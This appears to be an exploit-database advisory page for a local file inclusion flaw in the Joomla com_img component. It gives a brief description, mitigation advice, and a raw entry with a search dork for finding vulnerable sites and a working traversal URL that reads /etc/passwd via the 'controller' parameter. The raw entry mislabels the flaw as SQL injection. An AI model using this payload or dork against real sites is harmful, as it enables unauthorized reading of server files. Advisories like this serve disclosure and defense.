Joomla Component (com_img) LFI Vulnerability

vendor:

N/A

by:

CoBRa_21

7,5

CVSS

HIGH

LFI

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component (com_img) LFI Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable Joomla component (com_img) to read arbitrary files from the server. The vulnerable parameter is ‘controller’ which can be abused to traverse the directory structure and read any file on the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to directory traversal attacks. This can be done by validating user input and sanitizing it before using it in the application.

Source

Exploit-DB raw data:

################################################################################################################
Joomla Component (com_img) LFI  Vulnerability 
################################################################################################################
Author : CoBRa_21
Dork : inurl:com_img
################################################################################################################
Sql Injection :
http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
################################################################################################################
Thanks Cyber-Warrior.org  &  AKINCILAR 
################################################################################################################